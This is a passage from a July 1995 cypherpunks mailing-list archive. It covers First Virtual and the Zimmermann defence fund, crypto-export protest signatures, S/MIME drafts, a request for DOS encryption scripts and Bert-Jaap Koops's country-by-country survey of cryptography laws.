annoyance" sex: "good fuck" <-> "good sleep" violence: "kick the shit out of" <-> "have a minor disagreement" sarcasm: "that prick Exon" <-> "most honorable Sen Exon esq" legislese: "pillage and loot" <-> "govern" legislese: "tyrannically suppress" <-> "provide protections against" graphic: "lobotomised barney gif" <-> "we love barney" crypto: "fcrypt module" <-> "conventional poetry quatrain" The sky and your imagination is the limit. Oh yes, and 'May I express my annoyance Senator Exon!' :-) Adam -- HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/ --rsa--------------------------8<------------------------------- #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 At 04:52 PM 7/22/95 -0400, Rich Salz wrote: >Better yet do it the way Comedy Central wanted to: > Three strikes your out and term limits. You can run for re-election > but if you lose you get shot. > From djones at insight.mcmaster.ca Tue Jul 25 10:09:49 1995 From: djones at insight.mcmaster.ca (David Jones) Date: Tue, 25 Jul 95 13:09:49 EDT Subject: R. v. Pecciarich decision is online Message-ID: <9507251709.AA09853@insight.mcmaster.ca> The judge's decision in the recent "Pecciarich case" is now available online. Apparently, this is Canada's first conviction for distributing child pornography by computer. R. v. Pecciarich [1995] 22 O.R. (3d) p.748-766 HTML http://insight.mcmaster.ca/org/efc/pages/law/court/R.v.Pecciarich.html TEXT gopher://insight.mcmaster.ca/00/org/efc/law/R.v.Pecciarich.06apr95 -- Craig Hubley Business that runs on knowledge Craig Hubley & Associates needs software that runs on the net mailto:craig at hubley.com 416-778-6136 416-778-1965 FAX Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5 From craig at passport.ca Tue Jul 25 13:11:14 1995 From: craig at passport.ca (Craig Hubley) Date: Tue, 25 Jul 95 13:11:14 PDT Subject: R. v. Pecciarich decision is online (fwd) Message-ID: Forwarded message: From skaplin at mirage.skypoint.com Tue Jul 25 13:28:05 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Tue, 25 Jul 95 13:28:05 PDT Subject: Defcon agenda Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Can some kind soul forward me a copy of the agenda for Defcon? I need dates and times for the various speakers. Thanks, Sam -----BEGIN PGP SIGNATURE----- Version: 2.6.1 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMBVTh+5wXwthmZO1AQGMvgQAhB5RANbZTSPBX+mvdhMiUCnmY2tlYWC3 kTeZc9WNv0qAQSUaYZE0www8pu+X2pZhRaQOKFgbB5cnHvwxoWdgCMj6O8rmDT9X ft/cgB1cls/EOHOysZdPzzx3en+aVM9EedXpLrsx53uTzaG5SHTWVOfY4nexO65e HCTFO93Ct1I= =nNPb -----END PGP SIGNATURE----- From frissell at panix.com Tue Jul 25 13:29:05 1995 From: frissell at panix.com (Duncan Frissell) Date: Tue, 25 Jul 95 13:29:05 PDT Subject: Three strikes you're out! for politicians... yeah we wish! Message-ID: <199507252027.QAA08468@panix.com> At 04:52 PM 7/22/95 -0400, Rich Salz wrote: >Better yet do it the way Comedy Central wanted to: > Three strikes your out and term limits. You can run for re-election > but if you lose you get shot. > Or even better -- Gilbert and Sullivan's solution in "Utopia, Ltd." Despotism Tempered by Dynamite. Utopia, Ltd -- the South Sea Paradise that organized itself as a joint stock company -- was originally governed by an absolute despot whose despotism was kept in check by the existence of a Public Exploder. The Public Exploder's job was to blow the King up if he began to oppress the people. The exercise of his office was kept in check because if he blew up the King, he had to replace him. http://diamond.idbsu.edu/GaS/utopia/ DCF "Calynx: Yes. After many unhappy experiments in the direction of an ideal Republic, it was found that what may be described as a Despotism tempered by Dynamite provides, on the whole, the most satisfactory description of ruler--an autocrat who dares not abuse his autocratic power." From anonymous-remailer at shell.portal.com Tue Jul 25 14:43:53 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 25 Jul 95 14:43:53 PDT Subject: PGP message and keyring format Message-ID: <199507252142.OAA10281@jobe.shell.portal.com> Does anyone know of any documentation describing the format of PGP messages and keyrings, so that other applications can send and receive PGP-compatible messages and work with PGP keyrings? Thanks for any info.. From perry at imsi.com Tue Jul 25 14:48:53 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 25 Jul 95 14:48:53 PDT Subject: PGP message and keyring format In-Reply-To: <199507252142.OAA10281@jobe.shell.portal.com> Message-ID: <9507252148.AA16643@snark.imsi.com> anonymous-remailer at shell.portal.com writes: > Does anyone know of any documentation describing the format of PGP > messages and keyrings, so that other applications can send and receive > PGP-compatible messages and work with PGP keyrings? RTFM. The document you seek is actually in the distribution. Perry From nsb at nsb.fv.com Tue Jul 25 15:03:21 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 25 Jul 95 15:03:21 PDT Subject: Zimmerman legal fund In-Reply-To: <23424.9507181545@exe.dcs.exeter.ac.uk> Message-ID: Excerpts from mail: 23-Jul-95 Re: Zimmerman legal fund aba at dcs.exeter.ac.uk (5163) > Anon writes: > > Could someone in the know talk about the relationship between FV and > > the ZLDF? I don't like to spread misinformation, so I won't answer > > based on conjectures. > I'd be interested to hear this too, but what I am concerned about is > that the whole thing is too strongly tied to first virtual. The relationship is a completely open and friendly one, without any strings attached that I'm aware of. What most of you probably don't know is that FV has been a supporter of Phil Zimmerman's since long before you heard of us. We have had Phil on a monthly retainer since before the public rollout of our service (which probably means since before you even *heard* of First Virtual, since we didn't make any vaporware announcements). We've done this in order to get some advice on cryptography and some help with some specific needs (pgp-telnet, for example), but mostly we've done it because we thought he both needed and deserved our support. Why would a startup company want to devote significant resources to supporting Phil? Basically, we felt it was the right thing to do, particularly in our case. Here's why: like most net citizens, we believe that the people deserve free access to cryptography. However, we had just invented something nobody had ever imagined before -- a way to do reasonably safe net commerce *without* cryptography. Now, we thought this would be a good thing for society in its own right, for many reasons that would be a real digression here, but we recognized that every technology has both a good side and a bad side. Insofar as electronic commerce was going to be the motivating factor for permitting universal access to cryptography, FV's technology is/was a bad thing, because it decreases (at least somewhat) that motivation. We believe the positive features of our technology outweigh this negative, but we also felt we had a moral duty to lend our support to public access to cryptography, to try to offset any negative effect that our invention might have in that regard. So, FV has been a friend of Phil's for a long time. We launched the Yellow Ribbon campaign and the FV-based fundraising drive in that spirit, though clearly it doesn't exactly hurt us if people sign up for FV in order to donate to Phil. That really wasn't our motivation, however, and we sought to underscore that fact by making a donation to Phil's defense fund every time people sign up for a new account expressly in order to donate to ZLDF. In other words, if you are a Zimmerman supporter and you were thinking it might be nice to have an FV account anyway, you can help Phil even more by signing up and paying your $2 fee through the ZLDF pages. We've had lots of discussions with Phil Z and Phil D, and any time they expressed any discomfort with any of our ideas, we dropped them. There are two web sites basically because they are taking care of the informational aspects and we're concentrating (pro bono) on the online fundraising aspects. If we've overly stressed FV as a collection mechanism, I apologize, but you must bear in mind that we've been living and breathing the FV payment system for 18 months now, and it would be kind of hard for us not to even *mention* it. :-) > I mean there was the Yellow Ribbon Campaign but all URLs out of that > page point to FV, no mention of the at least two other (more > convenient for most people, and hence in Phil Zs interests) methods: > a) PGPed email CC no. to Phil Dubois (Phil Zs chief legal counsel) > b) similar PGPed email CC no. to some guy in Europe who was offering > to collect up all of the European donations, and send them to Dubois > in lump sums to save on currency exchange costs. Well, only on the cypherpunks list would you be likely to find general agreement that PGP'ed credit card numbers are "easier" than First Virtual. Many thousands of extremely naive net citizens are now happy FV customers, and I seriously doubt that most of them could master PGP without a full-day tutorial. (We're not talking about rocket scientists here, folks.) Mostly, though, I felt that the FV/ZLDF association was extremely important to defuse any potential political arguments of the form "FV has proven that public access to crypto is unnecessary." Such arguments would hurt the crypto cause, and would NOT sit well with the FV team, either. The truth is we're completely on the same side of this issue, folks. No hidden agendas, I promise. On behalf of First Virtual, I encourage everyone to donate money to ZLDF, using any mechanism that works. Better yet, use them all. -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMAN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net (http://www.netresponse.com/zldf) From carolab at censored.org Tue Jul 25 16:47:21 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Tue, 25 Jul 95 16:47:21 PDT Subject: You have cashed my check.... Message-ID: Dear First Virtual, You now present puzzling information. You have cashed my check. So why are you telling me that you have no bank information. You stated that the check itself provided the bank information. If this situation persists, I will forward said materials and correspondence to the State of Minnesota Attorney General's Office, and the U.S. District Attorney's Office for prosecution. For what you have connumicated so far surely appears fraudulent. I don't have much money as it is. But then maybe (considering all of the lag time) this is your scam. Maybe this is entirely legitimate, and just an honest mistake. I have added below your opening correspodence of July 18th, the day before the check cashed. Awaitng your response, Carol Anne Braddock Exhibit #1 - Acct. Acceptance Status >From carolann at censored.orgTue Jul 25 17:50:44 1995 Date: Tue, 25 Jul 1995 17:24:22 -0500 From: UnCensored Girls Anonymous To: cab at censored.org X-UIDL: 805661824.000 From: sgcs-server at card.com To: carolann at censored.org Y-Tag: 950611397619 Subject: newacct-result Comments: generated by via-btl.tcl - Enabled Mail (EM) environment for UNIX Date: Mon, 10 Jul 1995 15:35:00 -0400 Reply-to: support-newacct at card.com X-Status: The account for Carol Anne Braddock is now activated. Your First Virtual account identifier is: newt-carolann Please SAVE YOUR FIRST VIRTUAL ACCOUNT IDENTIFIER, and use it when you buy or sell information. (NOTE: This account identifier differs from the ID-choice that you provided when you applied for your account. We have added a unique prefix.) You may begin using your account to sell information over the Internet immediately! Exhibit #2 Your Letter Today. >From sgcs-server at card.comTue Jul 25 18:32:24 1995 Date: Tue, 25 Jul 1995 18:23:24 -0500 From: sgcs-server at card.com To: cab8 at censored.org Subject: change in account status This is an automated message from First Virtual's Internet Payment System. When we tried to verify the the bank account information associated with Carol Anne Braddock, the verification failed. INVALID ACCOUNT NUMBER Once this matter is corrected, we will be able to pay you for your sales. If you have changed your checking account, please follow the directions below. Otherwise, please send e-mail to: support-payout-failure at card.com CHANGING THE CHECKING ACCOUNT NUMBER USED FOR PAYMENT If you wish to change the account number of the checking account used to pay you, please send e-mail to: chgacct at card.com The ENTIRE body of your message should contain EXACTLY two lines: Account-ID: your First Virtual account identifier Financial-Changes: yes We will send you a confirming note. After you confirm, we will send you e-mail with a new application-ID and instructions on sending us a check for $10.00 (ten US dollars, to cover our paper processing expenses). -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From carolann at censored.org Tue Jul 25 17:52:13 1995 From: carolann at censored.org (UnCensored Girls Anonymous) Date: Tue, 25 Jul 95 17:52:13 PDT Subject: You have cashed my check.... Message-ID: <199507260052.RAA21103@mailhost.primenet.com> Look at the .sig And if it's a system that's vaporware we all need know about it. And if it is corrected, part 17/713 will have begun to go it's job, in a 'realworld' situation. >Please don't send this here. It has no place on this list. > >-Ekr > > -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From ncra at ix.netcom.com Tue Jul 25 18:20:20 1995 From: ncra at ix.netcom.com (NCRA ) Date: Tue, 25 Jul 95 18:20:20 PDT Subject: DOS Script Programming Request Message-ID: <199507260118.SAA19016@ix8.ix.netcom.com> To any interested party: I need 3 simple DOS scripts to be writter or translated from a UNIX script to DOS. The scripts need to do the following: 1) Look into a specific directory and execute a .bat file that will sign encrypt the file(s) in the directory using Viacrypt's PGP and wipe out the original. It then needs to move the cyphertext file(s) to a second directory. 2) The second script needs to log on to a netcom account, enter user id and password and upload the cyphertext files in the second directory using Z-modem transpher. The netcom account is already programmed to mail the files to the correct address. It then needs to logout and move the transfered files to a third directory. 3) The 3rd script needs to delete all files in the third directory that are over 15 days old on the 1st and 15th of each month. The first two scripts need to run on a timer and in sequential order on a daily basis. That's it. If you are interested, let me know and I will fill you in on specific details. Also include a proposed charge for the programming. Thanks. From tcmay at sensemedia.net Tue Jul 25 19:29:27 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Tue, 25 Jul 95 19:29:27 PDT Subject: "Only on the Cypherpunks list..." Message-ID: At 10:00 PM 7/25/95, Nathaniel Borenstein wrote: >Well, only on the cypherpunks list would you be likely to find general >agreement that PGP'ed credit card numbers are "easier" than First >Virtual. Many thousands of extremely naive net citizens are now happy >FV customers, and I seriously doubt that most of them could master PGP >without a full-day tutorial. (We're not talking about rocket scientists >here, folks.) A lot of truth here...sometimes the perfect is the enemy of the good. After all, only on the Cypherpunks list would you be likely to find general agreement that setting up a separate Intel box running Linux so one can create a suitable mail client is the preferred way to do secure e-mail? (Smileys for the :=)-impaired...I have nothing against Linux, and even browsed the new O'Reilly book recently. But I'm _still_ glad I'm "just a Mac user.") I have no idea what First Virtual's current or future business plans are, but I do expect more solid encryption, a la PGP or "real" RSA (licensed), will be coming soon. I assume FV is planning for this likely development. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From jed at blaze.cs.jhu.edu Tue Jul 25 19:31:55 1995 From: jed at blaze.cs.jhu.edu (Jeremy Rauch) Date: Tue, 25 Jul 95 19:31:55 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <9507251516.AA21669@spirit.aud.alcatel.com> Message-ID: <3v49e6$9sj@blaze.cs.jhu.edu> Daniel R. Oelke (droelke at spirit.aud.alcatel.com) wrote: : > of PGP...would you? : I would use a precompiled version of PGP *if* it came from : and was signed by someone I trusted. : After all - I don't read all the source code - do you? You mean you don't?!!! But seriously, I get it directly from MIT, check the checksums, etc. I'm pretty sure that it hasn't been tampered with. And, actually, I've read a good deal of the source code...especially the rsaref library. Not cause I'm paranoid, just interested. If I get the source code from, say, my friend, who I trust, who got it from someone he trusted, and so on down the line, the line of trust falls into question. Who's to say someone doesn't like someone on that line, and modifies the code...don't you have "friends" you don't like? :) : > And, note, it says sustantial change in value...I don't know if this is taken : > to mean monetary, or usability...the later might work. : > It's an interesting idea. : > Jeremy : > : I would say that if you can sell something that people : would otherwise get for free, then you have added value. : So, pre-compile for a couple of architectures, and then : slap them on a CD-ROM with source. : Definite tangable value from the CD-ROM then. : Dan : ------------------------------------------------------------------ : Dan Oelke Alcatel Network Systems : droelke at aud.alcatel.com Richardson, TX : http://spirit.aud.alcatel.com:8081/~droelke/ -- ____________________________________________________________________________ | Jeremy Rauch .--~~,__ | | | :-....,-------`~~'._.' | jed at cs.jhu.edu | | `-,,, ,_ ;'~U' | alhambra at jhu.edu | | Johns Hopkins _,-' ,'`-__; '--. | jed at jhunix.hcf.jhu.edu | | University (_/'~~ ''''(; | http://server.cs.jhu.edu/~jed | |______________________________________|_____________________________________| Finger for PGP key Member, *the Guild The light that burns twice as bright burns half as long From sameer at c2.org Tue Jul 25 21:02:07 1995 From: sameer at c2.org (sameer) Date: Tue, 25 Jul 95 21:02:07 PDT Subject: cypherpunks-lite Message-ID: <199507260359.UAA01559@infinity.c2.org> Does anyone have eric blossom's email address? I'd like to sub to his cpunks-lite. Thanks, -- sameer Voice: 510-601-9777 Network Administrator Pager: 510-321-1014 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From hal9001 at panix.com Tue Jul 25 21:03:02 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Tue, 25 Jul 95 21:03:02 PDT Subject: S/MIME and the Future of Netscape Message-ID: At 11:27 7/24/95, Timothy C. May wrote: >At 12:54 PM 7/23/95, Bob Snyder wrote: >>tcmay at sensemedia.net said: >>> With regard to SSL and Netscape not being open to outside developers, >>> several leading e-mail outfits, including Qualcomm, Netscape, >>> Frontier, etc., are working on an interoperable secure e-mail >>> standard called "Secure/MIME," or "S/MIME." >> >>Do you have sources for this information? MOSS is out there at least as a >>Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the >>original author of Eudora, is pretty active in the MIME community and I doubt >>he would support a second MIME type to do the same thing... > >Some of you have expressed skepticism about the mention of "S/MIME." [snip] All MOSS does is designate the MIME Headers/etc to support Encrypting and/or Signing MIME Parts. It says nothing as to how you do the Encoding or create Signature - only how to package the two parts into a MIME format once you have them. Thus S/MIME is/could-be an implementation of MOSS (as would be a MUA that used the MOSS formats to package a PGP signature or Encrypted Message). For those who want to read the docs, just send this message: >To: mailserv at ds.internic.net >From: YOUR-ADDRESS-GOES-HERE > >ENCODING mime >FILE /internet-drafts/draft-ietf-pem-mime-08.txt >FILE /internet-drafts/draft-ietf-pem-sigenc-03.txt From enzo at ima.net Tue Jul 25 21:19:20 1995 From: enzo at ima.net (Enzo Michelangeli) Date: Tue, 25 Jul 95 21:19:20 PDT Subject: Banks on the Net (Was: Re: Questions about Conferences) In-Reply-To: <9507251837.AA29943@deltanet.com> Message-ID: On Tue, 25 Jul 1995, Joel Hames wrote: > 3) Has anyone heard much about the security of First Security National > Bank? (www.fsnb.com) No such bank or domain: maybe you mean Security First Network Bank (www.sfnb.com). In any case, http://www.cybercash.com/directory.html contains a list of banks in USA, Canada and UK sporting Web pages. From jhames at mail.deltanet.com Tue Jul 25 22:35:36 1995 From: jhames at mail.deltanet.com (Joel Hames) Date: Tue, 25 Jul 95 22:35:36 PDT Subject: Banks on the Net (Was: Re: Questions about Conferences) Message-ID: <9507260535.AA28774@deltanet.com> In my previous post, I asked about the security of First Security National Bank, which doesn't exist. Enzo is right, I was wondering if anyone had information on the security of Security First National Bank (www.sfnb.com). Thanks Joel Hames jhames at deltanet.com From clg at glab.se Wed Jul 26 03:41:31 1995 From: clg at glab.se (Christian Lagerberg) Date: Wed, 26 Jul 95 03:41:31 PDT Subject: mailing list Message-ID: <199507261038.GAA27424@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- ANGAENDE mailing list hit me :=) - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMBYbGCoZzwIn1bdtAQGOJwF/bMkdrpPv/62bbIv+mlD4XjS9P5+bgezu RBQLRMZSSUkcL2RYa4kfUGCs5mO3ZVQ/ =KtMP -----END PGP SIGNATURE----- From E.J.Koops at kub.nl Wed Jul 26 03:54:38 1995 From: E.J.Koops at kub.nl (E.J.Koops at kub.nl) Date: Wed, 26 Jul 95 03:54:38 PDT Subject: Crypto Law Survey Message-ID: In a separate message is my survey of cryptography laws. I welcome comments and corrections, but mail me before 31 July, as I'm going on a six weeks' holiday next week. I shall try and keep an updated version on my homepage, where it will be available in a few weeks. To make the survey as wide and accurate as possible, I greatly appreciate receiving additional information. Regards, Bert-Jaap ---------------------------------------------------------------------- Bert-Jaap Koops tel +31 13 66 8101 Centre for Law and Informatization facs +31 13 66 8102 Tilburg University e-mail E.J.Koops at kub.nl -------------------------------------- Postbus 90153 | "We forgot the crackers!" | 5000 LE Tilburg | | The Netherlands | Wallace and Gromit | --------------------------------------------------------------------- http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm --------------------------------------------------------------------- From E.J.Koops at kub.nl Wed Jul 26 03:54:47 1995 From: E.J.Koops at kub.nl (E.J.Koops at kub.nl) Date: Wed, 26 Jul 95 03:54:47 PDT Subject: Crypto Law Survey Message-ID: CRYPTO LAW SURVEY Version July 1995 Bert-Jaap Koops (koops at kub.nl) Please credit if quoting. This survey of cryptography laws is based on several reports and on replies to a posting on Internet discussion lists. Only for France, The Netherlands, and Russia have I consulted original texts of relevant regulations; for the other countries, the reports listed below served as the only source. These findings, therefore, do not pretend to be exhaustive or fully reliable. I thank all who have provided me with information for this survey. Please send comments, corrections, updates, additional information, and questions to E.J.Koops at kub.nl. SOURCES [1] KPMG EDP Auditors, Rapport aan de Ministers van Binnenlandse Zaken, Justitie en Verkeer en Waterstaat inzake de uitkomsten van het Bedrijfseffectenonderzoek Cryptografie (Amstelveen, 7 april 1994), pp. 27-38, 107-114 [2] Moret Ernst & Young EDP Audit Management Services, Eindrapport onderzoek ontwerp-regeling encryptie, (Amsterdam, 1 maart 1994), pp. 21-30 [3] James P. Chandler, Diana C. Arrington, Donna R. Berkelhammer, and William L. Gill, Identification and Analysis of Foreign Laws and Regulations Pertaining to the Use of Commercial Encryption Products for Voice and Data Communications, DOE Project No. 2042-E024-A1, Washington, January 1994 [4] Andr� Sylvain, Data Encryption and the Law(s) - Results, posted on talk.politics.crypto, 15 December 1994 [5] various references; personal communications by Adam Back, Peter Gervai, Ulf Moeller, Marc Plumb, and Thomas Quinot. ----------------------------------------------------------------------------------- SURVEY PER COUNTRY 1. Export/ import regulations 2. Other laws/regulations pertaining to encryption 3. Threats/ intentions to regulate encryption 4. Regulations stimulating encryption use ----------------------------------------------------------------------------------- _COCOM_ 1. COCOM (Coordinating Committee for Multilateral Export Controls) is an international organization (Japan, Australia, and all NATO members, Ireland excluded) for the mutual control (and restriction) of strategic arms export. It maintains, among others, the International Industrial List and the International Munitions List. In 1991, COCOM has decided to allow export of mass-market cryptographic software (including public domain software). Some member countries of COCOM follow its regulations, but others, such as Germany and the United States, maintain separate regulations. _Australia_ [1, 3] 1. Written permission is needed for exporting cryptographic equipment designed to ensure the secrecy of communications or stored information. 2. no 3. no _Austria_ [1] 2. no 3. no _Belgium_ [1, 3] 1. no 2. no 3. no _Brazil_ [3] 1. no _Canada_ [1, 3, 4, 5] 1. Canada follows COCOM regulations. The exportation of items from Canada may be subject to restriction if they are included on the Export Control List. All types of cryptography can be transported between Canada and the United States, but cryptography imported from the US remains under US ITAR rules and cannot be exported if the US does not allow export. 2. no 3. no (but Canada is monitoring the debate in the US) _People's Republic of China_ [3] 1.China restricts the importation and exportation of voice-encoding devices. _Denmark_ [1, 4] 2. no 3. no 4. The Danish Teletrust Group has set up an Encryption Group to work on the technical and legal concept of public-key certifying authorities. A Centre Certifying Auhtority (CCA) would coordinate control and certification of key centres to provide secure keys within telecommunications. It would be necessary for such a CCA to have a legal basis. The Danish government has not (yet) implemented the initiative into law. _European Union_ [5] 2. no 3. There are rumours that the EU is working on the establishment of a key escrow system to counter the US Clipper initiative. The EU system would allow member states to choose escrow agents where keys have to be deposited. The European Community's Green Book on the Security of Information Systems (Draft 4.0, 18 October 1993) poses a case for the provision of "Public Confidentiality Services" (which offer some sort of Government Access to Keys). _Finland_ [4, 5] 2. no 3. no _France_ [1, 3, 4] 1. a) For exporting authentication- or integrity-only cryptography, a declaration dossier of export delivery must be deposited. A copy of the receipt of declaration must be presented to customs at each exportation. For temporary exportation, a user declaration will serve as export declaration in the case of cryptography used exclusively for personal use by an individual. A delivery declaration will serve as temporary-export declaration for a sample. b) For exporting any other kind of cryptography, apart from once depositing administrative and technical details needed for user or delivery authorisation, a license is needed for each exportation. 2. Delivery, exportation, and use of cryptography are subjected to: a) previous declaration if the cryptography can have no other object than authenticating communications or assuring the integrity of transmitted messages; b) previous authorisation by the Prime Minister in all other cases. Simplified procedures exist for certain cryptography products or certain user categories. For both declaration and authorisation, a dossier containing technical details and administrative data must be submitted. Authorisation can be subjected to certain conditions in order to reserve the use of certain types of cryptography to defined user or application categories. It is unclear to what extent this regulation is being maintained in practice. It seems impossible for individuals or enterprises to obtain authorisation for "strong" cryptography, such as RSA. Moreover, the office dealing with authorisation renders decisions without motivation. _Germany_ [1, 3, 4, 5] 1. COCOM regulations, but Germany maintains export control of both public domain and mass-market encryption software. 2. no 3. Some politicians have expressed a desire to regulate cryptography, but, on the whole, there seems to be no threat that Germany will prepare a law on cryptography. _Hungary_ [5] 2. no 3. no 4. There is a law that provides an agency with the competence to assess cryptography; the agency can declare that it satisfies a minimum security level. _Iceland_ [1] 2. no 3. no _India_ [3] 1. no _Ireland_ [1] 2. no 3. no _Israel_ [3] 1. Israel imposes restrictions on encryption, but the scope of its restrictions is not clear. _Italy_ [1, 3] 1. COCOM regulations. 2. There is a law that demands accessibility of encrypted records for the treasury. 3. no _Japan_ [1, 3] 1. COCOM regulations. 2. no 3. no _Latvia_ [4] 2. no 3. no _Mexico_ [3] 1. no _The Netherlands_ [3, 4, 5] 1. Public domain and mass-market software generally does not require a validated license. Items capable of file encryption do require a validated license. 2. no 3. In March 1994, a Dutch predraft law on cryptography leaked out, the drift of of which was a prohibition of having, using, or trading strong cryptography. Those with a "legitimate concern" could apply for a user license or a trade authorization. One condition for granting a license was giving information to an administration agency; the text did not state whether this information concerned only the algorithm or also all the keys used. After many protests from those who would be affected by the proposed regulation, it was withdrawn. The Dutch authorities are currently studying on alternatives to handle the issue. Although the draft regulation will not be continued in its present scope, it shows how much the judicial authorities fear wide dissemination of strong cryptography. It is to be expected that the Dutch government will want to regulate encryption in some way. _New Zealand_ [1] 2. no 3. no _Norway_ [1] 2. no. 4. A bill on information security has been proposed, which indicates that cryptography can be used for the storage of passwords. It is not sure if and when this bill will come into force. A bill has been proposed on central medical registries that would use cryptographically pseudonimized entries. _Russia_ [3, 5] 1. A license is required for the importation of encryption facilities manufactured abroad. 2. On 3 April 1995, president Jeltsin issued a decree prohibiting unauthorized encryption. State organizations and enterprises need a license to use encryption (for both authentication and secrecy, for storage as well as transmission). Other enterprises and organizations using uncertified cryptography do not receive state orders. The Central Bank shall take measures against commercial banks that do not use certified cryptography when communicating with divisions of the Central Bank. The development, production, implementation, or operation of cryptography without a license is prohibited. _Saudi Arabia_ [3] 1. no _South Africa_ [1, 3] 1. no 2. The South African situation is unclear. There appears to be legislation prohibiting the encryption of data on public telephone networks, but many companies and banks seem to ignore the legislation and do encrypt their data. _Spain_ [1] 2. no 3. no _Sweden_ [3, 4] 1. no 2. no 3. no _Switzerland_ [1, 3] 1. no 2. no 3. no _Turkey_ [1] 2. no. 3. no _United Kingdom_ [1, 3, 4, 5] 1. COCOM regulations. 2. no 3. In its policy on the information superhighway, Labour states it does not approve of escrowed encryption, but it wishes authorities to have the power to demand decryption under judicial warrant. It seems, then, that Labour intends to penalize a refusal to comply with a demand to decrypt under judicial warrant. _United States of America_ [1, 2, 4] 1. The International Traffic in Arms Regulation restricts export of "dual-use" cryptography (that is, cryptography that can serve both civilian and military purposes) by placing it on the Munitions List. For (relatively strong) products that can encipher information, an export license is usually issued only for use by foreign branches of American enterprises and for use y financial institutions. "Weak" cryptography (e.g., with a certain maximum key-length) can also be exported. Export of cryptography that serves only authentication or integrity purposes is ruled by the Export Administration Regulations. Some types of public domain software have been decontrolled and are now on the Commerce Control List. Several initiatives, as yet unsuccessful, have been taken, both in Congress and by the public, to try to mitigate the cryptography export restrictions. 2. no 3. In 1993, the Clinton Administration announced the Escrowed Encryption Initiative (EEI), usually referred to as the Clipper Initiative, after its first implementation in the Clipper chip. A classified, secret-key algorithm, SKIPJACK, has been implemented in an Escrowed Encryption Standard (EES). The reported basic idea of the EEI is to provide citizens with a safe cryptosysem for securing their communications without threatening law enforcement. The EES procures law enforcement access by means of a Law Enforcement Access Field (LEAF) that is transmitted along with each encrypted message; the field contains information identifying the chip used. Law enforcement agencies wire-tapping communications encrypted with EES can decipher tapped messages by obtaining the two parts of the chip's master key that are deposited with two escrow agencies (National Institute of Standards and Technology and the Treasury Department's Automated Systems Division), provided they have a court order for the tapping. The EES is a voluntary standard to be used in telephone communications. Privacy advocates fear that the government may declare escrowed encryption obligatory once it has captured a sufficient portion of the market. It is doubtful that EES will be widely accepted, though, given the scepticism with which the majority of US citizens presently regard escrowed encryption or government access to keys. On June 27, 1995, Senator Grassley introduced the Anti-Electronic Racketeering Act (S.974), which, if enacted, would virtually ban encryption. Only the use of escrow-like software would be an affirmative defense for those prosecuted for using cryptography. The bill doesn't seem to have much support at present. 4. The Utah Digital Signatures Act of 1995 provides a legal framework for the use of cryptography for authentication and integrity purposes. From Michael at umlaw.demon.co.uk Wed Jul 26 04:13:03 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Wed, 26 Jul 95 04:13:03 PDT Subject: Three strikes you're out! for politicians... yeah we wish! Message-ID: <2752@umlaw.demon.co.uk> In message <9507251610.AA16331 at ozymandias.austin.ibm.com> Scott Brickner writes: > Therefore, the only organization which can hold a > senator/representative liable for passing a bad law is the one which > passed the law. :( > and the voters -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html From nsb at nsb.fv.com Wed Jul 26 04:54:18 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 26 Jul 95 04:54:18 PDT Subject: "Only on the Cypherpunks list..." In-Reply-To: Message-ID: <8k5WhM_Mc50e0ssz9y@nsb.fv.com> Excerpts from mail: 25-Jul-95 "Only on the Cypherpunks li.. Timothy C. May at sensemedi (1596*) > I have no idea what First Virtual's 